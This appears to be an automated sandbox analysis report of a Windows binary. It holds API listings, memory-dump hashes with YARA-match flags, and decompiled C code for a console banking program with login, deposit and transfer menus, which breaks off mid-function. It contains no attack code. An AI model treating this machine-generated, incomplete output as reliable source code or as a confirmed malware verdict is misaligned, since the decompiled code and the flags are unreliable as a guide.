                                                0x012310b1
                                                0x012310c2
                                                0x012310d1
                                                0x012310dd
                                                0x012310f0
                                                0x012310f5
                                                0x012310f8
                                                0x0123110a
                                                0x01231121
                                                0x0123112b
                                                0x01231134
                                                0x01231141
                                                0x0123114b
                                                0x01231155
                                                0x0123115f
                                                0x01231172
                                                0x0123117b
                                                0x01231185
                                                0x0123118e
                                                0x01231198
                                                0x012311a1
                                                0x012311ab
                                                0x012311b4
                                                0x012311be
                                                0x012311d1
                                                0x012311db
                                                0x012311e4
                                                0x012311ed
                                                0x01231107
                                                0x01231107
                                                0x0123120b
                                                0x0123122e
                                                0x01231231
                                                0x01231236
                                                0x0123123e
                                                0x01231247
                                                0x0123124c
                                                0x01231251
                                                0x01231256
                                                0x0123125d
                                                0x01231260
                                                0x00000000
                                                0x00000000
                                                0x01231266
                                                0x01231269
                                                0x01231276
                                                0x01231279
                                                0x01231284
                                                0x01231284
                                                0x0123127b
                                                0x0123127f
                                                0x01231282
                                                0x0123128f
                                                0x01231292
                                                0x01231296
                                                0x01231296
                                                0x012312a0
                                                0x012312a2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01231282
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x012312a4
                                                0x012312a4
                                                0x012312a9
                                                0x012312a9
                                                0x0123126b
                                                0x00000000

                                                APIs
                                                • GetModuleHandleW.KERNEL32(Kernel32.dll,?,012389A2,01230000,00000000,00000000), ref: 01231052
                                                  • Part of subcall function 01236B80: GetProcessHeap.KERNEL32(00000001,17D78400,00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236B8C
                                                  • Part of subcall function 01236B80: HeapAlloc.KERNEL32(00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236B93
                                                  • Part of subcall function 01236B80: GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236BCD
                                                  • Part of subcall function 01236B80: HeapAlloc.KERNEL32(00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236BD4
                                                • LoadLibraryW.KERNEL32(User32.dll,23FDEF72,?,0E0BAA99,?,B616C5D9,?,012389A2,01230000,00000000,00000000), ref: 0123108C
                                                • LoadLibraryW.KERNEL32(User32.dll,695C9378,00000000,?,012389A2,01230000,00000000,00000000), ref: 012310A5
                                                • _memmove.LIBCMT ref: 012310F0
                                                • _wprintf.LIBCMT ref: 01231251
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Heap$AllocLibraryLoadProcess$HandleModule_memmove_wprintf
                                                • String ID: IEUCIZEO$Kernel32.dll$Press A to Log in as ADMINISTRATOR or S to log in as STAFF$User32.dll$User32.dll
                                                • API String ID: 2215760113-1224953502
                                                • Opcode ID: f1cfb7da98e0fbe52f0e95d8b6ba0e414f76b35301000ca7434cbb7e7ed0b6dd
                                                • Instruction ID: 08afd9cc00af8b1cae2df22be8b0b0cae08a55812a14bfa0ec7aad7eb6c1d1d6
                                                • Opcode Fuzzy Hash: f1cfb7da98e0fbe52f0e95d8b6ba0e414f76b35301000ca7434cbb7e7ed0b6dd
                                                • Instruction Fuzzy Hash: 56719CB4D5C2E9BADF01DBF988507FDBFB45F9A201F0880C9E5D1B6282C675474A8B21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 09434c0a7f4d26cce517a12e757e6d2bff6c7487bbf44ce06ae9ef5c4d5e5690
                                                • Instruction ID: 72261d182a507d1bebfb537b7ae34776d347d22aa29298ce90d21cd4de81e10b
                                                • Opcode Fuzzy Hash: 09434c0a7f4d26cce517a12e757e6d2bff6c7487bbf44ce06ae9ef5c4d5e5690
                                                • Instruction Fuzzy Hash: 65D0A7A7F895A128C66254DA38810F0FF1160A30325A812BBD445A3B419195C5B242AD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0941169b088898af65e568f6fd96808f92a70a5a0145b7631b7bc24d280608da
                                                • Instruction ID: a3488060fd0c936ff1f11347d9b803eb61a062b499a190cfdd731b647a69bd9d
                                                • Opcode Fuzzy Hash: 0941169b088898af65e568f6fd96808f92a70a5a0145b7631b7bc24d280608da
                                                • Instruction Fuzzy Hash: 33C08CA3F1590282D121082CBC413F0FB9A8313238D0423C7AC18AB0A24083C89680CA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c0eeb84dc7fa662ec9e51561e44fec7f2a72e856ba40717969d54f40418f16b0
                                                • Instruction ID: d699c5e6fd0dc36125522db5dcb2255529d458048599c5d65a707c4b0afc19a1
                                                • Opcode Fuzzy Hash: c0eeb84dc7fa662ec9e51561e44fec7f2a72e856ba40717969d54f40418f16b0
                                                • Instruction Fuzzy Hash: 06B09257F920080245209C6978020B0E360D08B076E21B6F3CD48B74021002802B4189
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ce9baf218cd4a0f257c1a72c4791903092f036cc642bead7890dd616c962f0a1
                                                • Instruction ID: 93a93cc26ded6b3e3924f10e87b4bd7c392777de06e75b0f4f37551f1411d95d
                                                • Opcode Fuzzy Hash: ce9baf218cd4a0f257c1a72c4791903092f036cc642bead7890dd616c962f0a1
                                                • Instruction Fuzzy Hash: 75C08C23A4824C4DC310DDBDF84527AF3E0EBC7226F1022BECD0CAB5009A22D05647CE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e1de411d354224edc809cedbf9e49fd2448a0c09c1f64e40a75704f0450c9fe0
                                                • Instruction ID: e720ec34d04f1865e5bf8dada5023fbe9576a49831aeda24454d89943beb92c5
                                                • Opcode Fuzzy Hash: e1de411d354224edc809cedbf9e49fd2448a0c09c1f64e40a75704f0450c9fe0
                                                • Instruction Fuzzy Hash: 649002A161114042D604619D454470640C5A7F1241F51C012A2184554CD5698C616175
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f84e8506f6911e1ffcb7cbcefa3afd1c83e272dee3e8662c350874780713d2bc
                                                • Instruction ID: 9114762b1b89f146f3b3ec40a266e35da705300d38415f59bd8c1bae84431d66
                                                • Opcode Fuzzy Hash: f84e8506f6911e1ffcb7cbcefa3afd1c83e272dee3e8662c350874780713d2bc
                                                • Instruction Fuzzy Hash: 9D90027160114802D604619D49446864085A7E0341F51C011A6054655EE6A58C917171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ede841c32203cf8af0c2e523c33d9dcb00fe2acc6c692a9ea562ebfeca6c930f
                                                • Instruction ID: 48b726ebfc026785c1bb8cf5c1d03c123f498b95ff00f0360e3eb5f090f72014
                                                • Opcode Fuzzy Hash: ede841c32203cf8af0c2e523c33d9dcb00fe2acc6c692a9ea562ebfeca6c930f
                                                • Instruction Fuzzy Hash: D6900271E05140129640719D49546468086B7F0781B55C011A0544554CD9948E5563F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 378bc2a0dc496419ad7baf404434bb0cb030133c69c5804b2192d5e3de58ab61
                                                • Instruction ID: 6f741133ff3f8d30717b3d3b126bc03f191a3f2b63172af9ea95d555ec0a93f3
                                                • Opcode Fuzzy Hash: 378bc2a0dc496419ad7baf404434bb0cb030133c69c5804b2192d5e3de58ab61
                                                • Instruction Fuzzy Hash: F99002E1601280924A00A29D8544B0A8585A7F0241B51C016E1084560CD5658C51A175
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e1917fca842847c01fd2bb360e07545c2957e2e1e9c1335278c2d6dc4c6ba968
                                                • Instruction ID: eca6ea7c8579fcf69a21bcee13bdce272230ae55311da9a9d4babf70c7107d96
                                                • Opcode Fuzzy Hash: e1917fca842847c01fd2bb360e07545c2957e2e1e9c1335278c2d6dc4c6ba968
                                                • Instruction Fuzzy Hash: 6A9002A160154403D640659D49446074085A7E0342F51C011A2094555EDA698C517175
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 68b7bb8c323923e24053affce95c4281105f162335179c3f7a5e103305c5aa63
                                                • Instruction ID: cea3cd2c9b15452cd82c8c1cb68109e286883d8118697a7f27a3ba50c4a4501e
                                                • Opcode Fuzzy Hash: 68b7bb8c323923e24053affce95c4281105f162335179c3f7a5e103305c5aa63
                                                • Instruction Fuzzy Hash: 50900265621140020645A59D074450B44C5B7E6391391C015F1446590CD6618C656371
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2ba51183ab12ec0216edd9739b0ec6954936482cd92045d2d6176b9d6d60baae
                                                • Instruction ID: ebce26a439709537a23a87dbbdf736fb452a604e34e9c2a6bb718df04fc09f0e
                                                • Opcode Fuzzy Hash: 2ba51183ab12ec0216edd9739b0ec6954936482cd92045d2d6176b9d6d60baae
                                                • Instruction Fuzzy Hash: 0C90026170114402D602619D45546064089E7E1385F91C012E1454555DD6658D53B172
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9193a5ea08c7b8197f049ccdbd6beb7866f32a9e89487e7303db2c107bff22e9
                                                • Instruction ID: b89375cfd68cae2557abc3dcf93c65aa4e13b06b7ff7f89777e1a4e7d66255ad
                                                • Opcode Fuzzy Hash: 9193a5ea08c7b8197f049ccdbd6beb7866f32a9e89487e7303db2c107bff22e9
                                                • Instruction Fuzzy Hash: 2390027164114402D641719D45446064089B7E0281F91C012A0454554ED6958E56BAB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c1f81e65b68d69565af5bbf9ed0bc5e100588cefee8b9b9455d2e785826ad0ce
                                                • Instruction ID: 3f60c07b36ba8f31534bd37cefc70e48a23aba5613d0cec11d82dfa7206762af
                                                • Opcode Fuzzy Hash: c1f81e65b68d69565af5bbf9ed0bc5e100588cefee8b9b9455d2e785826ad0ce
                                                • Instruction Fuzzy Hash: C49002A1A01280434A40B19D49444069095B7F1341391C121A0484560CD6A88C55A2B5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 413da06535e55ea3e9d3a3530e5b2f3edb00b6a8d47773fb856b4dac50c10a5a
                                                • Instruction ID: 22c413a8a15c29b30bdaeafcd78e8bb329c3cc285faba056ea7f1f4eeeb0b252
                                                • Opcode Fuzzy Hash: 413da06535e55ea3e9d3a3530e5b2f3edb00b6a8d47773fb856b4dac50c10a5a
                                                • Instruction Fuzzy Hash: F290027160158002D640719D858460B9085B7F0341F51C411E0455554CD6558C56A271
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 38f159d09d43c829571a3791c944ba5d32f169001ad8e9c0ff55bc53ed2d808a
                                                • Instruction ID: 415774f823e7eb23d04e82c17eee371283a1678d1cccae66b933bd0cfd7e596b
                                                • Opcode Fuzzy Hash: 38f159d09d43c829571a3791c944ba5d32f169001ad8e9c0ff55bc53ed2d808a
                                                • Instruction Fuzzy Hash: BF90027171128402D610619D85447064085A7E1241F51C411A0854558DD6D58C917172
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 317b382cdb69c6d43c4e196e7c913c3949e609f6f6f22570d6c3969170e35df9
                                                • Instruction ID: 49c0606e7535c9f9c646519357cc76a4ed7a2c40a4dc88a29480154c111d3ac0
                                                • Opcode Fuzzy Hash: 317b382cdb69c6d43c4e196e7c913c3949e609f6f6f22570d6c3969170e35df9
                                                • Instruction Fuzzy Hash: 77900271701140529A00A6DD5944A4A8185A7F0341B51D015A4044554CD5948C616171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aca2cc6393c5e2553f615b1ec747f1ef264a436cc969d7ab4ac039f211f8717c
                                                • Instruction ID: 45d182c5a1e4412acaabf3b640b9910a2de1ca7c5eb964e8c6794810d4d99353
                                                • Opcode Fuzzy Hash: aca2cc6393c5e2553f615b1ec747f1ef264a436cc969d7ab4ac039f211f8717c
                                                • Instruction Fuzzy Hash: 7990026164114802D640719D85547074086E7E0641F51C011A0054554DD6568D6576F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: df15a5ff6d67262dcb5da7bd7ec582f848a42dc331a917cc58f1fbc7d9a96343
                                                • Instruction ID: 0c4fcb233cc35a2e1d89d4b2f544482e3163e560696ad035dab699ca00f620ce
                                                • Opcode Fuzzy Hash: df15a5ff6d67262dcb5da7bd7ec582f848a42dc331a917cc58f1fbc7d9a96343
                                                • Instruction Fuzzy Hash: BD900261A0514402D640719D55587064095A7E0241F51D011A0054554DD6998E5576F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: be01d2c0dd09d1a5d5fe4acc817e93c2d2c8c073abd2923383820fb00a1aff73
                                                • Instruction ID: 4add7155b5fd2cc3e4d3dbe9fd4773e0a132501317551c49cbeaeb4971eeb6af
                                                • Opcode Fuzzy Hash: be01d2c0dd09d1a5d5fe4acc817e93c2d2c8c073abd2923383820fb00a1aff73
                                                • Instruction Fuzzy Hash: 3590026160518442D600659D5548A064085A7E0245F51D011A1094595DD6758C51B171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2f33805988ee416b805a5be47ac9c723129484b39b5ccc4203c412704544fc3c
                                                • Instruction ID: 3af2ccf5fa9b20b51b2db2ca851f751edabea4502f88801a2a6535a37d7fc0b1
                                                • Opcode Fuzzy Hash: 2f33805988ee416b805a5be47ac9c723129484b39b5ccc4203c412704544fc3c
                                                • Instruction Fuzzy Hash: 9A90027560518442DA00659D5944A874085A7E0345F51D411A045459CDD6948C61B171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d06f9e1932d41a62f45c15506eecc45d81d31af81db51a537195bb7e4aff060c
                                                • Instruction ID: f8cc8789e6eccbeadd767d8d264ae6f1378c6d2753f65fd383e3cc5677ad9101
                                                • Opcode Fuzzy Hash: d06f9e1932d41a62f45c15506eecc45d81d31af81db51a537195bb7e4aff060c
                                                • Instruction Fuzzy Hash: 1390027160114403D600619D56487074085A7E0241F51D411A0454558DE6968C517171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 63cbe61af9e3bc55b05766931e116deceb881c62741466397ee5132e25e027a3
                                                • Instruction ID: 066649558155f1423e5e99c0926593490336b44158d275aa9375782b0ef1d064
                                                • Opcode Fuzzy Hash: 63cbe61af9e3bc55b05766931e116deceb881c62741466397ee5132e25e027a3
                                                • Instruction Fuzzy Hash: 4D90026160158442D640629D4944B0F8185A7F1242F91C019A4186554CD9558C556771
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa2a1b3c198c475696aaba272b2e21c7f91e06d7383f74d611a310c64d2825af
                                                • Instruction ID: bb9009c0f8314e72c5b3b8864137955bc184ce3d09465d030f893f58ea6d5457
                                                • Opcode Fuzzy Hash: fa2a1b3c198c475696aaba272b2e21c7f91e06d7383f74d611a310c64d2825af
                                                • Instruction Fuzzy Hash: B890027160114842D600619D4544B464085A7F0341F51C016A0154654DD655CC517571
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2efced8a0f5438b7bb86f8ea68d2c94c6212bc991dbaac6998310efae2d09289
                                                • Instruction ID: ca72f2b5b99be7b467899281f001bc67e45b1d8fb66aca1633d7f6ed29ac51fd
                                                • Opcode Fuzzy Hash: 2efced8a0f5438b7bb86f8ea68d2c94c6212bc991dbaac6998310efae2d09289
                                                • Instruction Fuzzy Hash: DF90027160154402D600619D49487474085A7E0342F51C011A5194555ED6A5CC917571
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cea531db041bddc200c99bc84da16ce853e89b8615ea3786352d677b4474ba72
                                                • Instruction ID: d63773590e2cf4e873015c732a2a3c24ba620c9bf987008124fe9960af228091
                                                • Opcode Fuzzy Hash: cea531db041bddc200c99bc84da16ce853e89b8615ea3786352d677b4474ba72
                                                • Instruction Fuzzy Hash: 46900271A0514802D650719D45547464085A7E0341F51C011A0054654DD7958E5576F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 62%
                                                			E01233610(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                				char _v5;
                                                				intOrPtr _v12;
                                                				signed int _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				char _v36;
                                                				char _v39;
                                                				char _v43;
                                                				char _v47;
                                                				char _v51;
                                                				char _v55;
                                                				char _v59;
                                                				char _v63;
                                                				char _v67;
                                                				char _v68;
                                                				char _v80;
                                                				char _v92;
                                                				char _v124;
                                                				char _v156;
                                                				void* __ebp;
                                                				intOrPtr _t58;
                                                				intOrPtr _t60;
                                                				void* _t61;
                                                				void* _t98;
                                                				void* _t99;
                                                				void* _t108;
                                                				intOrPtr _t111;
                                                				void* _t121;
                                                				void* _t122;
                                                				void* _t123;
                                                				void* _t127;
                                                				void* _t128;
                                                				void* _t129;
                                                				void* _t130;
                                                				void* _t131;
                                                				void* _t139;
                                                				void* _t148;
                                                
                                                				_t148 = __fp0;
                                                				_t122 = __esi;
                                                				_t121 = __edi;
                                                				_t108 = __ebx;
                                                				_v68 = 0;
                                                				_v67 = 0;
                                                				_v63 = 0;
                                                				_v59 = 0;
                                                				_v55 = 0;
                                                				_v51 = 0;
                                                				_v47 = 0;
                                                				_v43 = 0;
                                                				_v39 = 0;
                                                				_v12 = 0;
                                                				_v20 = 0;
                                                				_v20 = 0;
                                                				do {
                                                					E01231380(_t121, _t122, 0, 0xa, 8, 0x46, 0xf);
                                                					E012312B0(7, 5);
                                                					_push("Only THREE attempts shall be allowed to enter username and password.");
                                                					E0123715C(_t108, _t121, _t122, 0);
                                                					E012312B0(0x17, 0xa);
                                                					_push("Enter User name : ");
                                                					E0123715C(_t108, _t121, _t122, 0);
                                                					E0123738B("%s", 0x1252ee4);
                                                					E012312B0(0x17, 0xc);
                                                					_push("Password        : ");
                                                					E0123715C(_t108, _t121, _t122, 0);
                                                					_t127 = _t123 + 0x14;
                                                					E012312F0(_t121, _t122,  &_v68);
                                                					_v20 = _v20 + 1;
                                                					_t143 = _v20 - 3;
                                                					if(_v20 == 3) {
                                                						E012320E0( &_v68, _t121, _t122, _t143, _t148);
                                                						E012312B0(0x19, 0xa);
                                                						_push(0x124fb98);
                                                						E0123715C(_t108, _t121, _t122, _t143);
                                                						E012312B0(0x16, 0xc);
                                                						_push("Press ENTER to exit the program...");
                                                						E0123715C(_t108, _t121, _t122, _t143);
                                                						_t127 = _t127 + 8;
                                                						E012377B1(0);
                                                					}
                                                					_v12 = 0;
                                                					_t58 = E01236EF1("USER.DAT", "r");
                                                					_t128 = _t127 + 8;
                                                					 *0x1252f28 = _t58;
                                                					while(1) {
                                                						_push( &_v156);
                                                						_push( &_v124);
                                                						_t60 =  *0x1252f28; // 0x0
                                                						_t61 = E01237021(_t60, "%s %s %s\n",  &_v92);
                                                						_t129 = _t128 + 0x14;
                                                						if(_t61 == 0xffffffff) {
                                                							break;
                                                						}
                                                						_t98 = E01238230(0x1252ee4,  &_v124);
                                                						_t128 = _t129 + 8;
                                                						if(_t98 == 0) {
                                                							_t99 = E01238230(0x1252f02,  &_v156);
                                                							_t128 = _t128 + 8;
                                                							if(_t99 == 0) {
                                                								_v12 = _v12 + 1;
                                                							}
                                                						}
                                                					}
                                                					_t111 =  *0x1252f28; // 0x0
                                                					_push(_t111);
                                                					E01236DB6(_t108, _t121, _t122, __eflags);
                                                					_t130 = _t129 + 4;
                                                					E012320E0(_t111, _t121, _t122, __eflags, _t148);
                                                					__eflags = _v12;
                                                					if(__eflags == 0) {
                                                						goto L10;
                                                					}
                                                					break;
                                                					L10:
                                                					E012312B0(0xa, 0xa);
                                                					_push(0x124fbf8);
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					_t123 = _t130 + 4;
                                                					__eflags = 1;
                                                				} while (1 != 0);
                                                				E01238417(__eflags,  &_v80);
                                                				_t131 = _t130 + 4;
                                                				E01233AB0(_t108, _t121, _t122, _t148);
                                                				do {
                                                					E012320E0(_t111, _t121, _t122, __eflags, _t148);
                                                					E012312B0(0xf, 8);
                                                					_push("1. Create New Account\n");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0xf, 0xa);
                                                					_push("2. Cash Deposit");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0xf, 0xc);
                                                					_push("3. Cash Withdrawl");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0xf, 0xe);
                                                					_push("4. Fund Transfer");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0xf, 0x10);
                                                					_push("5. Account information");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0x2d, 8);
                                                					_push("6. Transaction information");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0x2d, 0xa);
                                                					_push("7. Log out");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0x2d, 0xc);
                                                					_push("8. Exit");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					_t139 = _t131 + 0x20;
                                                					E012312B0(1, 0x11);
                                                					_v24 = 0;
                                                					while(1) {
                                                						__eflags = _v24 - 0x4e;
                                                						if(__eflags >= 0) {
                                                							break;
                                                						}
                                                						_push("_");
                                                						E0123715C(_t108, _t121, _t122, __eflags);
                                                						_t139 = _t139 + 4;
                                                						_t111 = _v24 + 1;
                                                						__eflags = _t111;
                                                						_v24 = _t111;
                                                					}
                                                					E012312B0(0x17, 0x13);
                                                					_push("Press a choice between the range [1-8] ");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					_t131 = _t139 + 4;
                                                					_v16 = 0x30;
                                                					_v16 = _v16 - 1;
                                                					__eflags = _v16 - 7;
                                                					if(__eflags > 0) {
                                                						E012320E0(_t111, _t121, _t122, __eflags, _t148);
                                                						E012312B0(0xa, 0xa);
                                                						_push("Your input is out of range! Enter a choice between 1 to 8!");
                                                						E0123715C(_t108, _t121, _t122, __eflags);
                                                						E012312B0(0xf, 0xc);
                                                						_push("Press any key to return to main menu...");
                                                						E0123715C(_t108, _t121, _t122, __eflags);
                                                						_t131 = _t131 + 8;
                                                					} else {
                                                						switch( *((intOrPtr*)(_v16 * 4 +  &M01233A88))) {
                                                							case 0:
                                                								E01233DE0(_t108, _t111, _t121, _t122, __eflags, _t148);
                                                								goto L35;
                                                							case 1:
                                                								__eax = E01234640(__ebx, __ecx, __edi, __esi, __eflags, __fp0);
                                                								goto L35;
                                                							case 2:
                                                								__eax = E012349E0(__ebx, __ecx, __edi, __esi, __eflags, __fp0);
                                                								goto L35;
                                                							case 3:
                                                								__eax = E01234E90(__ebx, __edi, __esi, __eflags, __fp0);
                                                								goto L35;
                                                							case 4:
                                                								__eax = E01235600(__ebx, __ecx, __eflags, __fp0);
                                                								goto L35;
                                                							case 5:
                                                								__eax = E01236190(__ebx, __ecx, __edx, __fp0);
                                                								goto L35;
                                                							case 6:
                                                								E012320E0(__ecx, __edi, __esi, __eflags, __fp0) = E012312B0(0xf, 0xa);
                                                								_push("Are you sure you want to Log out? <Y/N> : ");
                                                								__eax = E0123715C(__ebx, __edi, __esi, __eflags);
                                                								__esp = __esp + 4;
                                                								__ecx = _v5;
                                                								__eflags = __ecx - 0x59;
                                                								if(__eflags == 0) {
                                                									L28:
                                                									_t40 =  &_v36; // -15
                                                									_t40 = E01238417(__eflags, _t40);
                                                									 *0x1252f28 = E01236EF1("LOG.DAT", "a");
                                                									_t41 =  &_v36; // -15
                                                									__ecx = _t41;
                                                									_push(_t41);
                                                									_t42 =  &_v80; // -59
                                                									__edx = _t42;
                                                									_push(_t42);
                                                									_push(0x1252f40);
                                                									_push(0x1252ee0);
                                                									_push("%s %s %s %s\n");
                                                									__eax =  *0x1252f28; // 0x0
                                                									_push(__eax);
                                                									__eax = E01236F06(__ebx, __edi, __esi, __eflags);
                                                									__esp = __esp + 0x18;
